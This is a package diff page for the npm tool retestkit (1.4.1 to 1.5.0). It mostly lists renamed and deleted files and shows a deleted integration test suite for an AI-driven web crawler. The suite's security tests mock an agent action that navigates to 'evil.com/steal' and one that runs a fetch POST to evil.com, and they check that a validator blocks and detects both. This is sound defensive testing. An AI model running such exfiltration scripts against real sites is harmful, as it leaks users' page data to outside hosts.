npm - retestkit - Versions diffs - 1.4.1 → 1.5.0 - Mend

retestkit 1.4.1 → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (238)

package/README.md +59 -40
package/dist/config.js +8 -8
package/dist/config.js.map +1 -1
package/dist/logger.js +1 -1
package/dist/logger.js.map +1 -1
package/dist/prompts/index.d.ts +1 -1
package/dist/prompts/index.d.ts.map +1 -1
package/dist/prompts/index.js +21 -21
package/dist/prompts/index.js.map +1 -1
package/dist/prompts/templates/mcp/retest-crawl.md +7 -0
package/{src/prompts/templates/mcp/webtest-discover-flows.md → dist/prompts/templates/mcp/retest-discover-flows.md} +1 -1
package/{src/prompts/templates/mcp/webtest-discover.md → dist/prompts/templates/mcp/retest-discover.md} +2 -2
package/dist/prompts/templates/mcp/retest-full-workflow.md +12 -0
package/{src/prompts/templates/mcp/webtest-generate-tests.md → dist/prompts/templates/mcp/retest-generate-tests.md} +1 -1
package/{src/prompts/templates/mcp/webtest-run-test.md → dist/prompts/templates/mcp/retest-run-test.md} +1 -1
package/{src/prompts/templates/mcp/webtest-start.md → dist/prompts/templates/mcp/retest-start.md} +1 -1
package/{src → dist}/prompts/templates/sampling/system-prefix.md +1 -1
package/dist/resources/index.js +7 -7
package/dist/resources/index.js.map +1 -1
package/dist/schemas/config.js +2 -2
package/dist/schemas/config.js.map +1 -1
package/dist/security/index.js +1 -1
package/dist/security/index.js.map +1 -1
package/dist/server.js +3 -3
package/dist/server.js.map +1 -1
package/dist/test-utils/mock-context.js +22 -22
package/dist/test-utils/mock-context.js.map +1 -1
package/dist/tools/index.d.ts +1 -1
package/dist/tools/index.d.ts.map +1 -1
package/dist/tools/index.js +5 -5
package/dist/tools/index.js.map +1 -1
package/dist/tools/retest/crawl.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/crawl.js +7 -7
package/dist/tools/retest/crawl.js.map +1 -0
package/dist/tools/retest/discover-features.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/discover-features.js +6 -6
package/dist/tools/retest/discover-features.js.map +1 -0
package/dist/tools/retest/discover-flows.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/discover-flows.js +6 -6
package/dist/tools/retest/discover-flows.js.map +1 -0
package/dist/tools/retest/generate-tests.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/generate-tests.js +5 -5
package/dist/tools/retest/generate-tests.js.map +1 -0
package/dist/tools/retest/index.d.ts.map +1 -0
package/dist/tools/retest/index.js.map +1 -0
package/dist/tools/retest/run-test-case.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/run-test-case.js +3 -3
package/dist/tools/retest/run-test-case.js.map +1 -0
package/dist/tools/retest/schemas.d.ts.map +1 -0
package/dist/tools/retest/schemas.js.map +1 -0
package/dist/tools/retest/start-analysis.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/start-analysis.js +5 -5
package/dist/tools/retest/start-analysis.js.map +1 -0
package/dist/workspace/index.js +8 -8
package/dist/workspace/index.js.map +1 -1
package/dist/workspace/types.d.ts +2 -2
package/dist/workspace/types.d.ts.map +1 -1
package/package.json +6 -2
package/.claude/commands/openspec/apply.md +0 -23
package/.claude/commands/openspec/archive.md +0 -27
package/.claude/commands/openspec/proposal.md +0 -28
package/.gemini/commands/openspec/apply.toml +0 -21
package/.gemini/commands/openspec/archive.toml +0 -25
package/.gemini/commands/openspec/proposal.toml +0 -26
package/.github/prompts/openspec-apply.prompt.md +0 -22
package/.github/prompts/openspec-archive.prompt.md +0 -26
package/.github/prompts/openspec-proposal.prompt.md +0 -27
package/.github/workflows/release.yml +0 -33
package/.kilocode/workflows/openspec-apply.md +0 -17
package/.kilocode/workflows/openspec-archive.md +0 -21
package/.kilocode/workflows/openspec-proposal.md +0 -22
package/.mcp.json +0 -23
package/.opencode/command/openspec-apply.md +0 -25
package/.opencode/command/openspec-archive.md +0 -28
package/.opencode/command/openspec-proposal.md +0 -30
package/.roo/commands/openspec-apply.md +0 -20
package/.roo/commands/openspec-archive.md +0 -24
package/.roo/commands/openspec-proposal.md +0 -25
package/.vscode/mcp.json +0 -23
package/AGENTS.md +0 -18
package/CLAUDE.md +0 -18
package/dist/tools/webtest/crawl.d.ts.map +0 -1
package/dist/tools/webtest/crawl.js.map +0 -1
package/dist/tools/webtest/discover-features.d.ts.map +0 -1
package/dist/tools/webtest/discover-features.js.map +0 -1
package/dist/tools/webtest/discover-flows.d.ts.map +0 -1
package/dist/tools/webtest/discover-flows.js.map +0 -1
package/dist/tools/webtest/generate-tests.d.ts.map +0 -1
package/dist/tools/webtest/generate-tests.js.map +0 -1
package/dist/tools/webtest/index.d.ts.map +0 -1
package/dist/tools/webtest/index.js.map +0 -1
package/dist/tools/webtest/run-test-case.d.ts.map +0 -1
package/dist/tools/webtest/run-test-case.js.map +0 -1
package/dist/tools/webtest/schemas.d.ts.map +0 -1
package/dist/tools/webtest/schemas.js.map +0 -1
package/dist/tools/webtest/start-analysis.d.ts.map +0 -1
package/dist/tools/webtest/start-analysis.js.map +0 -1
package/openspec/AGENTS.md +0 -456
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/proposal.md +0 -33
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-resources/spec.md +0 -27
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-tools/spec.md +0 -304
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/tasks.md +0 -43
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/design.md +0 -209
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/proposal.md +0 -41
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/specs/mcp-server-core/spec.md +0 -183
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/tasks.md +0 -112
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/design.md +0 -333
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/proposal.md +0 -66
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/mcp-server-core/spec.md +0 -129
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-lifecycle/spec.md +0 -138
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-logging/spec.md +0 -211
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-prompts/spec.md +0 -157
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-resources/spec.md +0 -213
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-sampling/spec.md +0 -257
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-tools/spec.md +0 -501
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/tasks.md +0 -264
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/proposal.md +0 -24
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/specs/webtest-tools/spec.md +0 -80
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/tasks.md +0 -8
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/design.md +0 -90
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/proposal.md +0 -28
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/specs/webtest-sampling/spec.md +0 -90
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/tasks.md +0 -33
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/design.md +0 -558
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/proposal.md +0 -119
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-resources/spec.md +0 -109
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-tools/spec.md +0 -121
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/tasks.md +0 -133
package/openspec/changes/extract-prompts-to-markdown/design.md +0 -86
package/openspec/changes/extract-prompts-to-markdown/proposal.md +0 -50
package/openspec/changes/extract-prompts-to-markdown/specs/webtest-prompts/spec.md +0 -74
package/openspec/changes/extract-prompts-to-markdown/tasks.md +0 -40
package/openspec/changes/refactor-webtest-naming/design.md +0 -95
package/openspec/changes/refactor-webtest-naming/proposal.md +0 -66
package/openspec/changes/refactor-webtest-naming/specs/webtest-prompts/spec.md +0 -79
package/openspec/changes/refactor-webtest-naming/specs/webtest-resources/spec.md +0 -80
package/openspec/changes/refactor-webtest-naming/specs/webtest-sampling/spec.md +0 -122
package/openspec/changes/refactor-webtest-naming/specs/webtest-tools/spec.md +0 -113
package/openspec/changes/refactor-webtest-naming/tasks.md +0 -119
package/openspec/changes/rename-package-to-retest/proposal.md +0 -52
package/openspec/changes/rename-package-to-retest/specs/mcp-server-core/spec.md +0 -53
package/openspec/changes/rename-package-to-retest/specs/retest-lifecycle/spec.md +0 -68
package/openspec/changes/rename-package-to-retest/specs/retest-logging/spec.md +0 -35
package/openspec/changes/rename-package-to-retest/specs/retest-prompts/spec.md +0 -159
package/openspec/changes/rename-package-to-retest/specs/retest-resources/spec.md +0 -251
package/openspec/changes/rename-package-to-retest/specs/retest-sampling/spec.md +0 -99
package/openspec/changes/rename-package-to-retest/specs/retest-tools/spec.md +0 -295
package/openspec/changes/rename-package-to-retest/tasks.md +0 -71
package/openspec/project.md +0 -31
package/openspec/specs/mcp-server-core/spec.md +0 -178
package/openspec/specs/webtest-lifecycle/spec.md +0 -136
package/openspec/specs/webtest-logging/spec.md +0 -209
package/openspec/specs/webtest-prompts/spec.md +0 -155
package/openspec/specs/webtest-resources/spec.md +0 -248
package/openspec/specs/webtest-sampling/spec.md +0 -344
package/openspec/specs/webtest-tools/spec.md +0 -282
package/release.config.js +0 -9
package/src/config.test.ts +0 -96
package/src/config.ts +0 -32
package/src/elicitation/index.test.ts +0 -399
package/src/elicitation/index.ts +0 -171
package/src/elicitation/types.ts +0 -68
package/src/index.ts +0 -83
package/src/lifecycle/index.test.ts +0 -260
package/src/lifecycle/index.ts +0 -101
package/src/logger.redaction.test.ts +0 -322
package/src/logger.test.ts +0 -123
package/src/logger.ts +0 -229
package/src/playwright-client/index.ts +0 -392
package/src/playwright-client/types.ts +0 -99
package/src/progress/index.test.ts +0 -327
package/src/progress/index.ts +0 -170
package/src/progress/types.ts +0 -25
package/src/prompts/index.test.ts +0 -451
package/src/prompts/index.ts +0 -246
package/src/prompts/loader.test.ts +0 -100
package/src/prompts/loader.ts +0 -59
package/src/prompts/templates/mcp/webtest-crawl.md +0 -7
package/src/prompts/templates/mcp/webtest-full-workflow.md +0 -12
package/src/resources/index.ts +0 -250
package/src/resources/subscriptions.ts +0 -37
package/src/sampling/index.test.ts +0 -414
package/src/sampling/index.ts +0 -286
package/src/sampling/prompts.ts +0 -194
package/src/sampling/types.ts +0 -60
package/src/schemas/config.ts +0 -39
package/src/security/index.test.ts +0 -441
package/src/security/index.ts +0 -361
package/src/security/security-scenarios.test.ts +0 -468
package/src/server.ts +0 -211
package/src/test-utils/index.ts +0 -6
package/src/test-utils/mock-context.ts +0 -426
package/src/test-utils/mock-playwright-client.ts +0 -422
package/src/tools/index.ts +0 -11
package/src/tools/webtest/crawl.test.ts +0 -834
package/src/tools/webtest/crawl.ts +0 -901
package/src/tools/webtest/discover-features.ts +0 -412
package/src/tools/webtest/discover-flows.ts +0 -408
package/src/tools/webtest/generate-tests.test.ts +0 -532
package/src/tools/webtest/generate-tests.ts +0 -425
package/src/tools/webtest/index.ts +0 -7
package/src/tools/webtest/integration.test.ts +0 -536
package/src/tools/webtest/run-test-case.test.ts +0 -659
package/src/tools/webtest/run-test-case.ts +0 -508
package/src/tools/webtest/schemas.ts +0 -201
package/src/tools/webtest/start-analysis.test.ts +0 -151
package/src/tools/webtest/start-analysis.ts +0 -158
package/src/transports/http.ts +0 -19
package/src/transports/index.ts +0 -30
package/src/transports/stdio.ts +0 -7
package/src/types/capabilities.test.ts +0 -193
package/src/types/capabilities.ts +0 -50
package/src/types/context.ts +0 -21
package/src/types/tool.ts +0 -11
package/src/workspace/index.ts +0 -945
package/src/workspace/markdown.ts +0 -272
package/src/workspace/types.ts +0 -186
package/tests/integration/server.test.ts +0 -89
package/tests/integration/tools.test.ts +0 -99
package/tsconfig.json +0 -20
package/vitest.config.ts +0 -9
package/vitest.integration.config.ts +0 -10
package/{src → dist}/prompts/templates/sampling/crawl-action.md +0 -0
package/{src → dist}/prompts/templates/sampling/feature-discovery.md +0 -0
package/{src → dist}/prompts/templates/sampling/flow-discovery.md +0 -0
package/{src → dist}/prompts/templates/sampling/page-content-wrapper.md +0 -0
package/{src → dist}/prompts/templates/sampling/test-evaluation.md +0 -0
package/{src → dist}/prompts/templates/sampling/test-generation.md +0 -0
package/dist/tools/{webtest → retest}/crawl.d.ts +0 -0
package/dist/tools/{webtest → retest}/discover-features.d.ts +0 -0
package/dist/tools/{webtest → retest}/discover-flows.d.ts +0 -0
package/dist/tools/{webtest → retest}/generate-tests.d.ts +0 -0
package/dist/tools/{webtest → retest}/index.d.ts +0 -0
package/dist/tools/{webtest → retest}/index.js +0 -0
package/dist/tools/{webtest → retest}/run-test-case.d.ts +0 -0
package/dist/tools/{webtest → retest}/schemas.d.ts +0 -0
package/dist/tools/{webtest → retest}/schemas.js +0 -0
package/dist/tools/{webtest → retest}/start-analysis.d.ts +0 -0

package/src/tools/webtest/integration.test.ts DELETED

@@ -1,536 +0,0 @@
-/**
- * Integration Tests for Webtest Tools
- *
- * Tests for:
- * - 10.2: Full workflow (start → crawl → analyze → generate → run)
- * - 10.3: Cancellation mid-crawl
- * - 10.4: Fallback mode without sampling
- * - 10.5: Elicitation triggers
- * - 10.6: Resource listChanged notifications
- * - 10.7: Crawl resume from checkpoint
- * - 10.8: Loop detection triggers
- */
-import { describe, it, expect, vi, beforeEach } from "vitest";
-import {
-  createMockContext,
-  createMockPage,
-  createEcommerceMock,
-  type MockContext,
-} from "../../test-utils/index.js";
-import { createStartAnalysisTool } from "./start-analysis.js";
-import { createCrawlTool } from "./crawl.js";
-describe("Webtest Integration Tests", () => {
-  let context: MockContext;
-  beforeEach(() => {
-    context = createMockContext();
-  });
-  describe("10.3: Cancellation mid-crawl", () => {
-    it("handles cancellation gracefully", async () => {
-      // Set up a crawl that will be cancelled
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Start analysis
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      expect(startResult.isError).toBeFalsy();
-      const analysis = JSON.parse(startResult.content[0].text!);
-      // Set up context with sampling that simulates multi-step crawl
-      let stepCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        stepCount++;
-        // Cancel after 2 steps
-        if (stepCount === 2) {
-          context.cancellationRegistry.cancel(`crawl-${analysis.analysisId}-${Date.now()}`);
-        }
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "click", args: { selector: "a.link" } }],
-            reasoning: "Exploring",
-            goalProgress: "Making progress",
-            goalComplete: false,
-          },
-        };
-      });
-      // The cancellation won't trigger in this mock since we can't predict requestId
-      // But we can test that the registry works
-      const requestId = "test-cancel-id";
-      context.cancellationRegistry.register(requestId);
-      context.cancellationRegistry.cancel(requestId);
-      expect(context.cancellationRegistry.isCancelled(requestId)).toBe(true);
-    });
-  });
-  describe("10.4: Fallback mode without sampling", () => {
-    it("returns prompt resource when sampling unavailable", async () => {
-      // Disable sampling
-      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Start analysis
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      // Connect playwright and navigate
-      await context.playwrightClient.connect();
-      // Crawl should return fallback mode
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore the site",
-      });
-      expect(crawlResult.isError).toBeFalsy();
-      const crawlResponse = JSON.parse(crawlResult.content[0].text!);
-      expect(crawlResponse.needsManualInput).toBe(true);
-      expect(crawlResponse.prompt).toBeDefined();
-      expect(crawlResponse.instructions).toContain("manualNextActions");
-    });
-    it("accepts manualNextActions to continue crawl", async () => {
-      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Start analysis
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      // Connect playwright
-      await context.playwrightClient.connect();
-      // First call should return fallback mode
-      const firstResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore the site",
-      });
-      const firstResponse = JSON.parse(firstResult.content[0].text!);
-      expect(firstResponse.needsManualInput).toBe(true);
-      // Second call with manual actions should execute them
-      // Note: In real scenario, this would continue from checkpoint
-    });
-  });
-  describe("10.5: Elicitation triggers", () => {
-    it("creates cookie consent elicitation request", () => {
-      const request = context.elicitationClient.createCookieConsentRequest(
-        "GDPR banner detected"
-      );
-      expect(context.elicitationClient.createCookieConsentRequest).toHaveBeenCalled();
-    });
-    it("creates modal blocking elicitation request", () => {
-      const request = context.elicitationClient.createModalBlockingRequest(
-        "Newsletter signup modal"
-      );
-      expect(context.elicitationClient.createModalBlockingRequest).toHaveBeenCalled();
-    });
-    it("creates auth required elicitation request", () => {
-      const request = context.elicitationClient.createAuthRequiredRequest();
-      expect(context.elicitationClient.createAuthRequiredRequest).toHaveBeenCalled();
-    });
-    it("creates ambiguous navigation elicitation request", () => {
-      const options = [
-        { url: "/products", label: "Products" },
-        { url: "/services", label: "Services" },
-      ];
-      const request = context.elicitationClient.createAmbiguousNavigationRequest(options);
-      expect(context.elicitationClient.createAmbiguousNavigationRequest).toHaveBeenCalled();
-    });
-  });
-  describe("10.6: Resource listChanged notifications", () => {
-    it("notifies on workspace creation", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      await startTool.handler({
-        url: "https://example.com",
-      });
-      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
-    });
-    it("notifies on crawl creation", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up to complete immediately
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Goal achieved",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      // Connect playwright
-      await context.playwrightClient.connect();
-      // Clear previous calls
-      vi.clearAllMocks();
-      await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Quick test",
-      });
-      // Should notify multiple times (on crawl create, page save, etc.)
-      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
-    });
-  });
-  describe("10.7: Crawl resume from checkpoint", () => {
-    it("supports resume flag in crawl input", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up to complete immediately
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Goal achieved",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      // First crawl
-      await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-        resume: false,
-      });
-      // Second crawl with resume
-      const resumeResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Continue exploring",
-        resume: true, // This flag enables checkpoint loading
-      });
-      expect(resumeResult.isError).toBeFalsy();
-    });
-    it("loads checkpoint when resume is true", async () => {
-      // Mock checkpoint loading
-      const mockCheckpoint = {
-        step: 5,
-        timestamp: new Date().toISOString(),
-        visitedUrls: ["https://shop.example.com", "https://shop.example.com/products"],
-        currentUrl: "https://shop.example.com/products",
-        goalProgress: "Found products page",
-        canResume: true,
-      };
-      context.workspaceManager.loadCheckpoint = vi.fn().mockResolvedValue(mockCheckpoint);
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Goal achieved",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      // Crawl with resume
-      await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Continue exploring",
-        resume: true,
-      });
-      // Checkpoint load should have been called
-      expect(context.workspaceManager.loadCheckpoint).toHaveBeenCalled();
-    });
-  });
-  describe("10.8: Loop detection triggers", () => {
-    it("detects URL cycle after multiple visits", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up sampling to keep returning same URL navigation
-      let callCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        callCount++;
-        if (callCount >= 5) {
-          // End after 5 iterations
-          return {
-            success: true,
-            data: {
-              actions: [],
-              reasoning: "Loop detected",
-              goalProgress: "Stuck",
-              goalComplete: true,
-            },
-          };
-        }
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "navigate", args: { url: "https://shop.example.com" } }],
-            reasoning: "Navigating",
-            goalProgress: "Exploring",
-            goalComplete: false,
-          },
-        };
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-        limits: { maxSteps: 10 },
-      });
-      // Crawl should complete (either by goal or budget)
-      expect(crawlResult.isError).toBeFalsy();
-    });
-    it("blocks repeated identical actions", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up sampling to return the same action repeatedly
-      let callCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        callCount++;
-        if (callCount >= 5) {
-          return {
-            success: true,
-            data: {
-              actions: [],
-              reasoning: "Done",
-              goalProgress: "Complete",
-              goalComplete: true,
-            },
-          };
-        }
-        // Return same action every time
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "click", args: { selector: "button.submit" } }],
-            reasoning: "Clicking button",
-            goalProgress: "Trying",
-            goalComplete: false,
-          },
-        };
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-        limits: { maxSteps: 10 },
-      });
-      // Crawl should complete without error
-      // The loop detection should log warnings but continue
-      expect(crawlResult.isError).toBeFalsy();
-    });
-  });
-  describe("Security Validation in Crawl", () => {
-    it("blocks navigation to disallowed domains", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up security validator to reject external domains
-      context.securityValidator.validateAction = vi.fn().mockImplementation((action) => {
-        if (action.tool === "navigate" && action.args.url?.includes("evil.com")) {
-          return { valid: false, reason: "External domain not allowed" };
-        }
-        return { valid: true };
-      });
-      // Sampling returns navigation to disallowed domain
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "navigate", args: { url: "https://evil.com/steal" } }],
-          reasoning: "Found external link",
-          goalProgress: "Exploring",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-      });
-      // Crawl should complete but the external navigation should have been blocked
-      expect(context.securityValidator.validateAction).toHaveBeenCalled();
-    });
-    it("blocks data exfiltration attempts", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up exfiltration detection
-      context.securityValidator.detectExfiltrationAttempt = vi.fn().mockReturnValue({
-        detected: true,
-        type: "external_post",
-        evidence: "POST to external server",
-      });
-      // Sampling returns evaluate with POST
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{
-            tool: "evaluate",
-            args: { script: "fetch('https://evil.com', {method:'POST'})" },
-          }],
-          reasoning: "Running script",
-          goalProgress: "Testing",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-      });
-      // Exfiltration should have been detected
-      expect(context.securityValidator.detectExfiltrationAttempt).toHaveBeenCalled();
-    });
-  });
-  describe("Progress Reporting", () => {
-    it("emits progress during crawl", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      let stepCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        stepCount++;
-        if (stepCount >= 3) {
-          return {
-            success: true,
-            data: {
-              actions: [],
-              reasoning: "Done",
-              goalProgress: "Complete",
-              goalComplete: true,
-            },
-          };
-        }
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "click", args: { selector: "a" } }],
-            reasoning: "Exploring",
-            goalProgress: `Step ${stepCount}`,
-            goalComplete: false,
-          },
-        };
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-      });
-      // Progress should have been emitted
-      expect(context.progressEmitter.emit).toHaveBeenCalled();
-    });
-  });
-});